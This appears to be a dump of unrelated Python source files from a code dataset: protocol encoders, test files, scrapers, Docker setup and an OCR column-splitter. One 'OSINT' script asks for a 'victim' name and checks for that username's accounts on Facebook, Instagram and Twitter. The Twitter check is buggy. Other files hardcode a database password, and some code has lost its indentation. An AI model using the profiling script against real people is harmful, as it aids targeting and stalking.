# in campul de segment_code, al doilea octet va fi lungimea caracterelor utile
@staticmethod
def encode_end(transmitter,segment_data):
global end_transmission
transmitter.ack = transmitter.ack + 1 # primul ack trimis este 1
segment_number = transmitter.ack.to_bytes(4, byteorder='big', signed=False)
segment_type = b'\x03'
segment_data_len = len(segment_data)
segment_data = segment_data + b'\x00'*(DEFAULT_SIZE - segment_data_len)
segment_len = segment_data_len.to_bytes(2, byteorder='big', signed=False)
segment = segment_number + segment_type + segment_len + segment_data
return segment
@staticmethod
def encode_error(transmitter,segment_data):
pass
@staticmethod
def encode(transmitter,tip, data):
segment_type = {
'START': DataEncoding.encode_start,
'DATA' : DataEncoding.encode_data,
'END' : DataEncoding.encode_end
}
return segment_type.get(tip, DataEncoding.encode_error)(transmitter,data)
#citirea fisier ca pachete de octeti
@staticmethod
def bytes_from_file(transmitter, chunk_size=DEFAULT_SIZE):
with open(transmitter.filepath, "rb") as f:
while True:
chunk = f.read(chunk_size)
if chunk:
yield chunk
else:
break
#codificarea pachetelor de octeti
@staticmethod
def encode_bytes(transmitter):
for b in DataEncoding.bytes_from_file(transmitter.filepath):
if len(b) == DEFAULT_SIZE:
yield DataEncoding.encode(transmitter,'DATA', b)
else:
yield DataEncoding.encode(transmitter,'END', b)
|
4,313 | 71b78b1347456420c3fc29605887d20ba5bff06e | from zeus import auth, factories
from zeus.constants import Result, Status
from zeus.models import FailureReason
from zeus.tasks import aggregate_build_stats_for_job
def test_unfinished_job(mocker, db_session, default_source):
auth.set_current_tenant(auth.Tenant(repository_ids=[default_source.repository_id]))
build = factories.BuildFactory(source=default_source, queued=True)
db_session.add(build)
job = factories.JobFactory(build=build, in_progress=True)
db_session.add(job)
aggregate_build_stats_for_job(job.id)
assert build.status == Status.in_progress
assert build.result == Result.unknown
def test_finished_job(mocker, db_session, default_source):
auth.set_current_tenant(auth.Tenant(repository_ids=[default_source.repository_id]))
build = factories.BuildFactory(source=default_source, in_progress=True)
db_session.add(build)
job = factories.JobFactory(build=build, failed=True)
db_session.add(job)
aggregate_build_stats_for_job(job.id)
assert build.status == Status.finished
assert build.result == Result.failed
def test_failing_tests(mocker, db_session, default_source):
auth.set_current_tenant(auth.Tenant(repository_ids=[default_source.repository_id]))
build = factories.BuildFactory(source=default_source, in_progress=True)
db_session.add(build)
job = factories.JobFactory(build=build, passed=True)
db_session.add(job)
factories.TestCaseFactory(job=job, failed=True)
aggregate_build_stats_for_job(job.id)
assert job.result == Result.failed
reasons = list(FailureReason.query.filter(FailureReason.job_id == job.id))
assert len(reasons) == 1
assert reasons[0].reason == FailureReason.Code.failing_tests
|
4,314 | d959ed49a83fb63e0bce31b5c81c013f0986706b | #!/usr/bin/python
# Developed by Hector Cobos
import sys
import csv
import datetime
def mapper():
# Using a reader in order to read the whole file
reader = csv.reader(sys.stdin, delimiter='\t')
# Jump to the next line. We want to avoid the line with the name of the fields
reader.next()
# loop
for line in reader:
# Checking no. of fields are correct
if len(line) == 19:
author_id=line[3]
date=line[8]
time = date.strip().split(" ")
hour = time[1].strip().split(":")
print "{0}\t{1}".format(author_id, hour[0])
mapper()
|
4,315 | ccba923fa4b07ca9c87c57797e1e6c7da3a71183 | import time #melakukan import library time
import zmq #melakukan import library ZeroMQ
context = zmq.Context() #melakukan inisialisasi context ZeroMQ pada variable context
socket = context.socket(zmq.REP) #menginisialisasikan socket(Reply) pada variable context(ZeroMQ)
socket.bind("tcp://10.20.32.221:5555") #melakukan binding socket dengan port tcp 5555
while True: #Looping selama kondisi benar
message = socket.recv() #menampung pesan yang diterima oleh socket ke dalam variable message
print("Received request: %s" % message) #melakukan output dari message yang diterima
# do some work
time.sleep(1) #waktu interval untuk istirahat/melakukan proses berikutnya
socket.send(b"World") #mengirim suatu pesan berupa bit pesan ('world') ke dalam socket
|
4,316 | 36e538ca7fbdbf6e2e6ca1ae126e4e75940bb5cd | def check_orthogonal(u, v):
return u.dot(v) == 0
def check_p():
import inspect
import re
local_vars = inspect.currentframe().f_back.f_locals
return len(re.findall("p\\s*=\\s*0", str(local_vars))) == 0
|
4,317 | c27c29a5b4be9f710e4036f7f73a89c7d20acea5 | class String:
def reverse(self,s):
return s[::-1]
s=input()
obj1=String()
print(obj1.reverse(s)) |
4,318 | 6c8180d24110045348d9c2041c0cca26fa9ea2d2 | # OSINT By FajarTheGGman For Google Code-in 2019©
import urllib3 as url
class GCI:
def banner():
print("[---- OSINT By FajarTheGGman ----]\n")
def main():
user = str(input("[!] Input Name Victim ? "))
init = url.PoolManager()
a = init.request("GET", "https://facebook.com/" + user)
b = init.request("GET", "https://instagram.com/" + user)
c = init.request("GET", "https://twitter.com/" + user)
if a.status == 200:
print("[+] " + user + " => Found In Facebook")
else:
print("[-] " + user + " => NotFound in Facebook")
if b.status == 200:
print("[+] " + user + " => Found In Instagram")
else:
print("[-] " + user + " => NotFound in Instagram")
if b.status == 200:
print("[+] " + user + " => Found In Twitter")
else:
print("[-] " + user + " => NotFound in Twitter")
x = GCI
x.banner()
x.main() |
4,319 | 8bf75bf3b16296c36c34e8c4c50149259d792af7 | import sys
try:
myfile = open("mydata.txt",encoding ="utf-8")
except FileNotFoundError as ex:
print("file is not found")
print(ex.args)
else:
print("file :",myfile.read())
myfile.close()
finally :
print("finished working")
|
4,320 | 77f37a80d160e42bb74017a55aa9d06b4c8d4fee | # !/usr/bin/python
# coding:utf-8
import requests
from bs4 import BeautifulSoup
import re
from datetime import datetime
#紀錄檔PATH(建議絕對位置)
log_path='./log.txt'
#登入聯絡簿的個資
sid=''#學號(Ex. 10731187)
cid=''#生份證號(Ex. A123456789)
bir=''#生日(Ex. 2000/1/1)
#line or telegram module
#platform='telegram'
platform='line'
if platform=='line':
from linebot import LineBotApi
from linebot.models import TextSendMessage
#line api token
bottoken=''
#line chat id
chatid=''
line_bot_api = LineBotApi(bottoken)
if platform=='telegram':
#telegram bot token
bottoken=''
#telegram group chat id
chatid=''
#課表
cls=[['學校活動','英文','化學','國文','地理','生物','公民','歷史','數學'],
['彈性課程','地科','數學','數學','資訊','西洋影視','國文','國文','英文'],
['數學','物理','生活科技','體育','國文','化學','音樂','英文','英文'],
['數學','論孟選讀','生物','多元選修','歷史','化學','英文','國防','物理'],
['彈性課程','英文','數學','地理','公民','國文','體育','物理','社團'],[],[]]
def open_log():
global log
global fw
try:
fr = open(log_path, "r")
log=fr.read().split('\n')
fr.close()
except:
fw = open(log_path, "w+")
log=''
return
fw = open(log_path, "a")
return
def login_homework():
res = requests.get('http://www.yphs.tp.edu.tw/tea/tu2.aspx')
soup = BeautifulSoup(res.text, "lxml")
VIEWSTATE=soup.find(id="__VIEWSTATE")
VIEWSTATEGENERATOR=soup.find(id="__VIEWSTATEGENERATOR")
EVENTVALIDATION=soup.find(id="__EVENTVALIDATION")
res=requests.post('http://www.yphs.tp.edu.tw/tea/tu2.aspx', allow_redirects=False, data = {'__VIEWSTATE':VIEWSTATE.get('value'),'__VIEWSTATEGENERATOR':VIEWSTATEGENERATOR.get('value'),'__EVENTVALIDATION':EVENTVALIDATION.get('value'),'chk_id':'學生/家長','tbx_sno':sid,'tbx_sid':cid,'tbx_sbir':bir,'but_login_stud':'登 入'})
global cook
cook=res.cookies['ASP.NET_SessionId']
return
def crawl_and_fetch_today_homework(tomorrow_calendar,tomorrow_class_table):
send = requests.get('http://www.yphs.tp.edu.tw/tea/tu2-1.aspx',cookies={'ASP.NET_SessionId':cook})
soup = BeautifulSoup(send.text, "lxml")
VIEWSTATE=soup.find(id="__VIEWSTATE")
VIEWSTATEGENERATOR=soup.find(id="__VIEWSTATEGENERATOR")
EVENTVALIDATION=soup.find(id="__EVENTVALIDATION")
for x in range(15,1,-1):#第一頁1~15則
try:#用try怕有頁面沒15則post
#數字轉文字
num=str('')
if(x<10):
num='0'+str(x)
else:
num=str(x)
#爬內文
send = requests.post('http://www.yphs.tp.edu.tw/tea/tu2-1.aspx',cookies={'ASP.NET_SessionId':cook}, data = {'__VIEWSTATE':VIEWSTATE.get('value'),'__VIEWSTATEGENERATOR':VIEWSTATEGENERATOR.get('value'),'__EVENTVALIDATION':EVENTVALIDATION.get('value'),('GridViewS$ctl'+num+'$but_vf1'):'詳細內容'})
soup = BeautifulSoup(send.text, "lxml")
#檢查市否已發過
ok=bool(True)
for y in range(0,len(log),1):
if soup.find(id='Lab_purport').text==log[y]:
ok=bool(False)
if ok==True:#沒發過
fw.write(soup.find(id='Lab_purport').text+'\n')
post_title=str('[主旨:'+str(soup.find(id='Lab_purport').text)+']')
post_content=str(soup.find(id='Lab_content').text)
post_attachment=str(' ')
if(soup.find(target='_blank')):
post_attachment=soup.find(target='_blank').get('href')
send_word=post_title+'\n'+post_content+'\n'+post_attachment
if(str(soup.find(id='Lab_purport').text).find('聯絡簿')>=0 and datetime.today().weekday()<4):
send_word=send_word+'\n***系統訊息***\n'+tomorrow_calendar+'\n'+tomorrow_class_table
if(str(soup.find(id='Lab_purport').text).find('聯絡簿')>=0 and datetime.today().weekday() == 4 ):
send_word=send_word
post(send_word)
except:
pass
return
def crawl_tomorrow_calendar():
res = requests.get('http://www.yphs.tp.edu.tw/yphs/gr2.aspx')
soup = BeautifulSoup(res.text, "lxml")
calendar='明日行事曆:\n 全校:'+soup.find_all(color="#404040")[16].text
if(soup.find_all(color="#404040")[16].text==' '):
calendar+='N/A'
calendar=calendar+'\n 高一:'+soup.find_all(color="#404040")[21].text
if(soup.find_all(color="#404040")[21].text==' '):
calendar+='N/A'
return calendar
def fetch_tomorrow_class_table():
count=int(0)
tomorrow_class='\n明日課表:\n 早上:\n '
for i in cls[(datetime.today().weekday()+1)%7]:
if(count==4):
tomorrow_class+='\n 下午:\n '
tomorrow_class+='['+i+']'
if(count<8 and count!=3):
tomorrow_class+='->'
count+=1
return tomorrow_class
def post(send_word):
if platform=='line':
line_bot_api.push_message(chatid,TextSendMessage(text=send_word,wrap=True))
if platform=='telegram':
requests.get("https://api.telegram.org/bot"+bottoken+"/sendMessage?chat_id="+chatid+"&text="+send_word)
'''
!!!contact ab0897867564534231@gmail.com for this function!!!
def crawl_message_board():
res = requests.get('http://59.120.227.144:11300/line/api.php')
soup = BeautifulSoup(res.text, "lxml")
message_board = soup.find_all('td')
message='\n\n留言板( http://59.120.227.144:11300/line/ ) : \n'
for i in range(0,len(message_board),3):
message=message+'第'+str(int((i/3)+1))+'則:\n-'+message_board[i+1].text+"\n--來自:"+message_board[i+2].text+'\n'
return message
'''
def close_log():
fw.close()
def main():
open_log()
login_homework()
crawl_and_fetch_today_homework(crawl_tomorrow_calendar(),fetch_tomorrow_class_table())
close_log()
#星期天提醒明天要上課
if(datetime.today().weekday()==6 and datetime.today().hour == 21 and datetime.today().minute<10):
send_word='[主旨:機器人訊息]\n***系統訊息***\n'+crawl_tomorrow_calendar()+'\n'+fetch_tomorrow_class_table()
post(send_word)
main() |
4,321 | 68d9f77f91a13c73373c323ef0edbe18af9990a3 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from celery import Celery
app = Celery('task', include=['task.tasks'])
app.config_from_object('task.config')
if __name__ == '__main__':
app.start()
|
4,322 | c64e41609a19a20f59446399a2e864ff8834c3f0 | import tty
import sys
import termios
def init():
orig_settings = termios.tcgetattr(sys.stdin)
tty.setcbreak(sys.stdin)
return orig_settings
def get_input():
return sys.stdin.read(1)
def exit(orig_settings):
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, orig_settings)
if __name__ == "__main__":
settings = init()
key = 0
while key != chr(27): # esc
key = get_input()
print("'" + str(key) + "'")
exit(settings) |
4,323 | 598c634aac1df951f544127e102a1e2d61cac0b0 | #!/usr/bin/env python
from time import sleep
from org.mustadroid.python.interleech import processPage
import MySQLdb
from org.mustadroid.python.interleech.item import Item
import re
import time
if __name__ == "__main__":
db = MySQLdb.connect(host = "localhost",
user = "interleech",
passwd = "abc123",
db = "interleech")
cur = db.cursor()
sqlQuery = "SELECT * FROM interleech ORDER by id ASC"
while True:
cur.execute(sqlQuery)
results = cur.fetchall()
print results
rows = [results[5]]
for row in results:
print "\n################## PROCESSING " + row[1] + " #######################\n"
processPage.attrList = set()
processPage.dbHintsDict = dict()
processPage.tableName = row[1]
processPage.abortProcessing = False
processPage.xmlBase = re.compile('(.*)/(.*)').search(row[3]).group(1) + "/"
processPage.base = re.compile('(.*).se/(.*)').search(row[2]).group(1) + ".se"
processPage.timeStamp = int(time.time() * 100)
itemList = []
processPage.processPage(row[2], row[3], itemList, Item)
Item.CreateTable(processPage.tableName, processPage.attrList, processPage.dbHintsDict)
i = 0
for item in itemList:
if item.id is not None:
item.Save(processPage.tableName, processPage.attrList, processPage.timeStamp - i)
i += 1
print "\n################### FINISHED PROCESSING #######################\n"
sleep(60)
db.close()
|
4,324 | a5c9ff1fe250310216e2eaa7a6ff5cc76fc10f94 | import docker
import logging
import sys
if __name__ == '__main__':
# setting up logger
logging.basicConfig(stream=sys.stdout,
format='[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',
level=logging.DEBUG)
# get the docker client
client = docker.from_env()
# list out docker volumes
logging.info(str([x.name for x in client.volumes.list()]))
# Check if airflow backend volume is created or not
# if the volume is not created then create it
if 'airflow_pg_data' not in [x.name for x in client.volumes.list()]:
client.volumes.create('airflow_pg_data')
# kill container if it is already running
logging.info(str([x.name for x in client.containers.list()]))
if 'airflow_pg' not in [x.name for x in client.containers.list()]:
# launch postgres backend
pg = client.containers.run(image='postgres',
name='airflow_pg',
auto_remove=True,
detach=True,
environment={
'POSTGRES_PASSWORD': 'airflow',
'POSTGRES_USER': 'airflow',
'PGDATA': '/airflow/data'
},
volumes={'airflow_pg_data': {'bind': '/airflow/data', 'mode': 'rw'}},
ports={'5432/tcp': 5432}
)
|
4,325 | c218428908c28a8c65bd72e66dcddaf7db1909d7 | from __future__ import absolute_import
from talin.quotations import register_xpath_extensions
def init():
register_xpath_extensions() |
4,326 | 15bf84b716caf66a23706e9292b47ddb9bf4d35e | num = int(input("Enter the number: "))
print("Multiplication Table of", num)
for i in range(1, 10):
print(num,"a",i,"=",num * i)
|
4,327 | 0c7816028e6cbd12684b0c7484835e735f1d2838 | #!/usr/bin/env python3
import argparse
from glob import glob
import sys
import numpy as np
import matplotlib.pyplot as plt
import pysam
import math
import pandas as pd
import haplotagging_stats
import os
import collections
import seaborn as sns
NUM_CONTIGS="num_contigs"
TOTAL_LEN="total_len"
HAPLOTYPE="haplotype"
HAPLO_SEX="haplotype-sex"
SEX="sex"
# cat Y1_assemblies_v2_genbank_QC.csv | sed 's/,/\t/g' | awk '{print $1,$2,$3,"Maternal","\n",$1,$6,$7,"Paternal"}' | sed 's/^ //' | sed 's/ $//' | sed 's/ /,/g' | sed 's/mat_//g' | sed 's/pat_//g' >Y1_assemblies_v2_genbank_QC.contig_stats.csv
# cat Y1_assemblies_v2_genbank_QC.full.csv | sed 's/,/\t/g' | awk '{print $1,$2,$3,"Maternal","Maternal-",$23,$23,"\n",$1,$6,$7,"Paternal","Paternal-",$23,$23}' | sed 's/- /-/g' | sed 's/^ //' | sed 's/ $//' | sed 's/ /,/g' | sed 's/mat_//g' | sed 's/pat_//g' >Y1_assemblies_v2_genbank_QC.contig_stats.csv
def parse_args(args = None):
parser = argparse.ArgumentParser("Plots information from haplotagging_stats tsv")
parser.add_argument('--input_csv', '-i', dest='input_csv', default=None, required=True, type=str,
help='CSV file holding data')
parser.add_argument('--figure_name', '-f', dest='figure_name', default="HPRC_contig_stats", required=False, type=str,
help='Figure name')
return parser.parse_args() if args is None else parser.parse_args(args)
def log(msg):
print(msg, file=sys.stderr)
def get_color(filename):
if "maternal" in filename.lower():
return "darkred"
if "paternal" in filename.lower():
return "darkblue"
return "black"
def main():
args = parse_args()
df = pd.read_csv(args.input_csv)
print(df.head())
# sns.set_palette(sns.color_palette(["darkred", "darkblue"]))
# sns.boxplot(x=HAPLOTYPE, y=NUM_CONTIGS, data=df)#, palette={"Maternal":"darkred","Paternal":"darkblue"})
# spax = sns.swarmplot(x=HAPLOTYPE, y=NUM_CONTIGS, hue=SEX, data=df, palette={"Female":"fuchsia","Male":"cyan"}) #color="fuchsia")
sns.boxplot(x=HAPLO_SEX, y=NUM_CONTIGS, data=df, order=["Maternal-Female", "Maternal-Male", "Paternal-Female", "Paternal-Male"],
palette={"Maternal-Male":"darkred","Maternal-Female":"darkred","Paternal-Male":"darkblue","Paternal-Female":"darkblue"})
spax = sns.swarmplot(x=HAPLO_SEX, y=NUM_CONTIGS, data=df, order=["Maternal-Female", "Maternal-Male", "Paternal-Female", "Paternal-Male"],
palette={"Maternal-Male":"royalblue","Maternal-Female":"crimson","Paternal-Male":"royalblue","Paternal-Female":"crimson"})
plt.title("")
plt.ylabel("Contig Count")
plt.xlabel("Haplotype")
plt.tight_layout()
# plt.set_size_inches(12, 12)
#
if args.figure_name is not None:
plt.savefig(args.figure_name+".contig_count.png", format='png', dpi=200)
plt.savefig(args.figure_name+".contig_count.pdf", format='pdf', dpi=300)
plt.show()
plt.close()
# sns.boxplot(x=HAPLOTYPE, y=TOTAL_LEN, data=df)#, palette={"Maternal":"darkred","Paternal":"darkblue"})
# spax = sns.swarmplot(x=HAPLOTYPE, y=TOTAL_LEN, hue=SEX, data=df, palette={"Female":"fuchsia","Male":"cyan"}) #color="fuchsia")
sns.boxplot(x=HAPLO_SEX, y=TOTAL_LEN, data=df, order=["Maternal-Female", "Maternal-Male", "Paternal-Female", "Paternal-Male"],
palette={"Maternal-Male":"darkred","Maternal-Female":"darkred","Paternal-Male":"darkblue","Paternal-Female":"darkblue"})
spax = sns.swarmplot(x=HAPLO_SEX, y=TOTAL_LEN, data=df, order=["Maternal-Female", "Maternal-Male", "Paternal-Female", "Paternal-Male"],
palette={"Maternal-Male":"royalblue","Maternal-Female":"crimson","Paternal-Male":"royalblue","Paternal-Female":"crimson"})
plt.title("")
plt.ylabel("Total Length")
plt.xlabel("Haplotype")
plt.tight_layout()
# plt.set_size_inches(12, 12)
#
if args.figure_name is not None:
plt.savefig(args.figure_name+".total_len.png", format='png', dpi=200)
plt.savefig(args.figure_name+".total_len.pdf", format='pdf', dpi=300)
plt.show()
if __name__ == "__main__":
main()
|
4,328 | d2a9a2fd3a1118c0855b8f77ce4c25cc6b4e8f87 | import random
def get_ticket():
ticket = ''
s = 'abcdefghijkrmnopqrstuvwxyz1234567890'
for i in range(28):
r_num = random.choice(s)
ticket += r_num
return ticket
|
4,329 | f4fa7563d2cce5ee28198d4974a4276d9f71f20b | import sys
import pandas as pd
from components.helpers.Logger import Logger
class DataFrameCreatorBase:
"""
DataFrameCreatorBase
"""
START_DATE = "03/16/2020"
def __init__(self, input_file):
self._input_file = input_file
self.df = self._read_raw_csv()
self._clean_df()
def __new__(cls, *args, **kwargs):
if not hasattr(cls, 'instance'):
cls.instance = super().__new__(cls)
return cls.instance
def _read_raw_csv(self):
try:
return pd.read_csv(f'files/input/{self._input_file}')
except Exception as e:
Logger.log_message(
Logger.ERROR,
f"Failed to convert csv file {self._input_file} to dataframe: {e}"
)
sys.exit(1)
def _clean_df(self):
pass |
4,330 | 71cee06ce697030fd0cea363ddecaa411b39544d | from appConfig.App import app, db
import os
dbDir = os.path.dirname(__file__)
# staticFolder = '%sstatic' % os.sep
dbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)
if not os.path.exists(dbDir):
# 创建数据库并创建表
db.create_all()
# app._static_folder = staticFolder
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
if __name__ == '__main__':
app.run()
|
4,331 | 23937ae531cc95069a1319f8c77a459ba7645363 | # write dictionary objects to be stored in a binary file
import pickle
#dictionary objects to be stored in a binary file
emp1 = {"Empno" : 1201, "Name" : "Anushree", "Age" : 25, "Salary" : 47000}
emp2 = {"Empno" : 1211, "Name" : "Zoya", "Age" : 30, "Salary" : 48000}
emp3 = {"Empno" : 1251, "Name" : "Simarjeet", "Age" : 27, "Salary" : 49000}
emp4 = {"Empno" : 1266, "Name" : "Alex", "Age" : 29, "Salary" : 50000}
empObj = open('Emp.dat',"wb")
#write onto the file
pickle.dump(emp1,empObj)
pickle.dump(emp2,empObj)
pickle.dump(emp3,empObj)
pickle.dump(emp4,empObj)
print("Successfully written four dictionaries")
empObj.close()
|
4,332 | ba41f2a564f46032dbf72f7d17b2ea6deaa81b10 | from __future__ import unicode_literals
import abc
import logging
import six
import semantic_version
from lymph.utils import observables, hash_id
from lymph.core.versioning import compatible, serialize_version
logger = logging.getLogger(__name__)
# Event types propagated by Service when instances change.
ADDED = 'ADDED'
REMOVED = 'REMOVED'
UPDATED = 'UPDATED'
class ServiceInstance(object):
def __init__(self, id=None, identity=None, **info):
self.id = id
self.identity = identity if identity else hash_id(info.get('endpoint'))
self.info = {}
self.update(**info)
def update(self, **info):
version = info.pop('version', None)
if version:
version = semantic_version.Version(version)
self.version = version
self.info.update(info)
def __getattr__(self, name):
try:
return self.info[name]
except KeyError:
raise AttributeError(name)
def serialize(self):
d = {
'id': self.id,
'identity': self.identity,
'version': serialize_version(self.version),
}
d.update(self.info)
return d
@six.add_metaclass(abc.ABCMeta)
class InstanceSet(observables.Observable):
@abc.abstractmethod
def __iter__(self):
raise NotImplementedError()
def match_version(self, version):
return VersionedServiceView(self, version)
class Service(InstanceSet):
def __init__(self, name=None, instances=()):
super(Service, self).__init__()
self.name = name
self.instances = {i.id: i for i in instances}
self.version = None
def __str__(self):
return self.name
def __iter__(self):
return six.itervalues(self.instances)
def __len__(self):
return len(self.instances)
def get_instance(self, prefix):
for instance in six.itervalues(self.instances):
if instance.id.startswith(prefix):
return instance
def identities(self):
return list(self.instances.keys())
def remove(self, instance_id):
try:
instance = self.instances.pop(instance_id)
except KeyError:
pass
else:
self.notify_observers(REMOVED, instance)
def update(self, instance_id, **info):
try:
instance = self.instances[instance_id]
except KeyError:
instance = self.instances[instance_id] = ServiceInstance(**info)
self.notify_observers(ADDED, instance)
else:
instance.update(**info)
self.notify_observers(UPDATED, instance)
class VersionedServiceView(InstanceSet):
def __init__(self, service, version):
self.service = service
self.spec = compatible(version)
self.version = version
def __str__(self):
return '%s@%s' % (self.name, self.version)
@property
def name(self):
return self.service.name
def __iter__(self):
for instance in self.service:
if instance.version in self.spec:
yield instance
def observe(self, *args, **kwargs):
return self.service.observe(*args, **kwargs)
|
4,333 | 91d240b02b9d7a6c569656337521482d57918754 |
# https://github.com/jscancella/NYTribuneOCRExperiments/blob/master/findText_usingSums.py
import os
import io
from pathlib import Path
import sys
os.environ['OPENCV_IO_ENABLE_JASPER']='True' # has to be set before importing cv2 otherwise it won't read the variable
import numpy as np
import cv2
import subprocess
from multiprocessing import Pool
from scipy.signal import find_peaks, find_peaks_cwt
import scipy.ndimage as ndimage
from IPython.display import Image as KImage
#custom kernel that is used to blend together text in the Y axis
DILATE_KERNEL = np.array([
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0]], dtype=np.uint8)
# Run adaptative thresholding (is slow af compared to not using it in pipeline)
def adaptative_thresholding(img, threshold):
# Load image
I = img
# Convert image to grayscale
gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)
# Original image size
orignrows, origncols = gray.shape
# Windows size
M = int(np.floor(orignrows/16) + 1)
N = int(np.floor(origncols/16) + 1)
# Image border padding related to windows size
Mextend = round(M/2)-1
Nextend = round(N/2)-1
# Padding image
aux =cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=Nextend,
right=Nextend, borderType=cv2.BORDER_REFLECT)
windows = np.zeros((M,N),np.int32)
# Image integral calculation
imageIntegral = cv2.integral(aux, windows,-1)
# Integral image size
nrows, ncols = imageIntegral.shape
# Memory allocation for cumulative region image
result = np.zeros((orignrows, origncols))
# Image cumulative pixels in windows size calculation
for i in range(nrows-M):
for j in range(ncols-N):
result[i, j] = imageIntegral[i+M, j+N] - imageIntegral[i, j+N]+ imageIntegral[i, j] - imageIntegral[i+M,j]
# Output binary image memory allocation
binar = np.ones((orignrows, origncols), dtype=np.bool)
# Gray image weighted by windows size
graymult = (gray).astype('float64')*M*N
# Output image binarization
binar[graymult <= result*(100.0 - threshold)/100.0] = False
# binary image to UINT8 conversion
binar = (255*binar).astype(np.uint8)
return binar
def Q_test(sorted_data):
conf95_level = {3: .97, 4: .829, 5: .71, 6: .625, 7: .568, 8: .526, 9: .493}
q_exp = abs(sorted_data[1] - sorted_data[0]) / abs(sorted_data[-1] - sorted_data[0])
print(str(abs(sorted_data[1] - sorted_data[0])) + ' / ' + str(abs(sorted_data[-1] - sorted_data[0])))
print("q_exp : " + str(q_exp))
return q_exp > conf95_level[min(9, len(sorted_data))]
# static variables for clarity
COLUMNS = 0
GREEN = (0, 255, 0)
# parameters that can be tweaked
LINE_THICKNESS = 3 # how thick to make the line around the found contours in the debug output
PADDING = 10 # padding to add around the found possible column to help account for image skew and such
CREATE_COLUMN_OUTLINE_IMAGES = True # if we detect that we didn't find all the columns. Create a debug image (tiff) showing the columns that were found
def columnIndexes(a):
"""
creates pair of indexes for left and right index of the image column
For example [13, 1257, 2474, 3695, 4907, 6149]
becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]
"""
nrows = (a.size-2)+1
return a[1*np.arange(nrows)[:,None] + np.arange(2)]
def convertToGrayscale(img):
temp_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
return temp_img
def invert(img):
""" Black -> White | White -> Black """
print("invert image")
# Should we edit these parameters?
#3/18/21 - experimented on threshold, 140 is good.
_,temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)
return temp_img
def dilateDirection(img, debug=False):
"""
It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'.
So it increases the white region in the image or size of foreground object increases.
Normally, in cases like noise removal, erosion is followed by dilation.
Because, erosion removes white noises, but it also shrinks our object.
So we dilate it. Since noise is gone, they won't come back, but our object area increases.
It is also useful in joining broken parts of an object.
"""
print("applying dilation morph")
temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15) #the more iterations the more the text gets stretched in the Y axis, 15 seems about right.
'''
if debug:
filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)
cv2.imwrite(filepath, temp_img)
'''
return temp_img
def createColumnImages(img, basename, directory):
"""
we sum each column of the inverted image. The columns should show up as peaks in the sums
uses scipy.signal.find_peaks to find those peaks and use them as column indexes
"""
files = []
temp_img = convertToGrayscale(img)
temp_img = invert(temp_img)
temp_img = dilateDirection(temp_img)
sums = np.sum(temp_img, axis = COLUMNS)
sums[0] = 1000 # some random value so that find_peaks properly detects the peak for the left most column
sums = sums * -4 # invert so that minimums become maximums and exagerate the data so it is more clear what the peaks are
peaks, _ = find_peaks(sums, distance=600) # the column indexs of the img array, spaced at least 800 away from the previous peak
sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
sorted_sums = sorted(sum_to_index.keys())
'''
qr = Q_test(sorted_sums)
if qr:
peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
'''
print("PeakNum, Sum, QRemove for " + basename)
for x in peaks:
print(str(x) + ', ' + str(sums[x]))
print("----------")
if peaks.size == 0:
with open('troublesomeImages.txt', 'a') as f:
print("ERROR: something went wrong with finding the peaks for image: ", os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + ".jpg 0\n")
return files
peaks[0] = 0 # automatically make the left most column index the start of the image
peaks[-1] =sums.size -1 # automatically make the right most column index the end of the image
boxed = np.copy(img)
if peaks.size < 6:
with open('troublesomeImages.txt', 'a') as f:
print("found image that is causing problems: ", os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + ".jpg " + str(peaks.size) + "\n")
columnIndexPairs = columnIndexes(peaks)
ystart = 0
yend = img.shape[0]
for columnIndexPair in columnIndexPairs:
xstart = max(columnIndexPair[0]-PADDING, 0)
xend = min(columnIndexPair[1]+PADDING, img.shape[1])
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (basename, xstart,xend))
files.append(filepath)
crop_img = img[ystart:yend, xstart:xend]
print("writing out cropped image: ", filepath)
# Apply adaptative thresholding to the image with a threshold of 25/100
#crop_img = adaptative_thresholding(crop_img, 25)
if not cv2.imwrite(filepath, crop_img):
print('failed')
if CREATE_COLUMN_OUTLINE_IMAGES:
cv2.rectangle(boxed,(xstart,ystart),(xend,yend), GREEN, LINE_THICKNESS)
if CREATE_COLUMN_OUTLINE_IMAGES:
filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
# For removing the old image?
# os.remove(os.path.join(directory, basename + ".jp2"))
return files
def invert_experiment():
test_img = cv2.imread('./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')
for thresh in range(1, 200, 20):
print('writing thresh= ' + str(thresh))
_,temp_img = cv2.threshold(test_img, thresh, 255, cv2.THRESH_BINARY_INV)
cv2.imwrite('./ocr/test_images/thresh='+str(thresh)+'.jpg', temp_img)
def test(img, basename):
#h, w, _ = img.shape
#test_img = cv2.imread('./ocr/data/8k71pf94q/2_commonwealth_8k71pf94q_accessFull.jpg')
test_img = convertToGrayscale(img)
#ret,test_img = cv2.threshold(test_img,25,255,0)
